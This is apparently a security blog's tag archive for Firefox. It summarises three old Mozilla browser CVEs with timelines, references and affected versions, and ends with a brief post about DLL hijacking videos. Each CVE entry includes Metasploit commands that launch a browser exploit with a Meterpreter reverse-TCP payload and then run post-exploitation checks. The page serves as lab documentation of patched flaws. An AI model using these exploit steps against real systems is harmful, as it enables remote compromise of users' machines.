Tag Archives: Firefox

CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit

Timeline :

Vulnerability discovered in the wild
Vulnerability corrected by vendor the 2010-10-27
Vulnerability & Exploit-DB PoC disclosed by unknown the 2010-10-29
Metasploit PoC released the 2011-02-17

PoC provided by :

unknown
scriptjunkie

Reference(s) :

CVE-2010-3765
MFSA 2010-73
EDB-ID-15352
OSVDB-ID-68905

Affected version(s) :

All Firefox 3.6.x versions previous version 3.6.12
All Firefox 3.5.x versions previous version 3.5.15
All Thunderbird 3.1.x versions previous version 3.1.6
All Thunderbird 3.0.x versions previous version 3.0.10
All SeaMonkey 2.0.x versions previous version 2.0.10

Tested on Windows XP SP3 with :

Firefox 3.6.9 released the 2010-09-23

Description :

This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a metasploit port of the in-the-wild exploit.

Commands :

use exploit/windows/browser/mozilla_interleaved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
getuid
sysinfo
ipconfig

CVE-2005-2265 : Mozilla Suite/Firefox InstallVersion compareTo() Code Execution

Timeline :

Vulnerability reported to the vendor by Aviv Raff the 2005-05-28
Version 1.0.5 of Mozilla Firefox & 1.7.10 of Mozilla Suite released the 2005-07-12
Vulnerability & PoC disclosure by Aviv Raff the 2005-07-13

    PoC provided by :

hdm
Aviv Raff

    Reference(s) :

CVE-2005-2265
MFSA 2005-50

    Affected version(s) :

Mozilla Firefox previous version 1.0.5
Mozilla Suite previous version 1.7.10

    Tested on Windows XP SP3 with :

    Mozilla Firefox 1.0.4

    Description :

This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit module is a direct port of Aviv Raff’s HTML PoC.

    Commands :

use exploit/multi/browser/mozilla_compareto
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

CVE-2006-3677 : Mozilla Suite/Firefox Navigator Object Code Execution

Timeline :

Vulnerability reported to ZDI by Anonymous
Vulnerability reported to the vendor by ZDI the 2006-06-16
Coordinated vulnerability disclosure the 2006-07-26
PoC provided by hdm the 2006-07-27
Metasploit PoC provided the 2006-07-30

    PoC provided by :

hdm

    Reference(s) :

CVE-2006-3677
MFSA 2006-45
ZDI-06-025

    Affected version(s) :

Version previous Firefox 1.5.0.5

    Tested on Windows XP SP3 with :

    Firefox 1.5.0.4

    Description :

This module exploits a code execution vulnerability in the Mozilla Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit requires the Java plugin to be installed.

    Commands :

use exploit/multi/browser/mozilla_navigatorj­ava
set SRVHOST 192.168.178.21
set TARGET 0
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

sessions -i 1
sysinfo
getuid
ipconfig

Some videos of DLL Hijacking exploitation with Metasploit

Didn’t have time in August (holidays) to write a complete blog posts on the DLL Hijacking thing. So I only did some YouTube videos, how explain better the dangerousity of this flaw. But what is interesting in this story, is the “Acros” position on the HDMoore proposed coordinate disclosure process and the collision between security researchers on the same vulnerability without knowing that they are working on the same thing but thousand of milles away from each other.

[youtube DjewBjJR0HA]

[youtube gtLTUZvOYc0]

[youtube EeztydiJTeU]

[youtube O_bX0I9hF1s]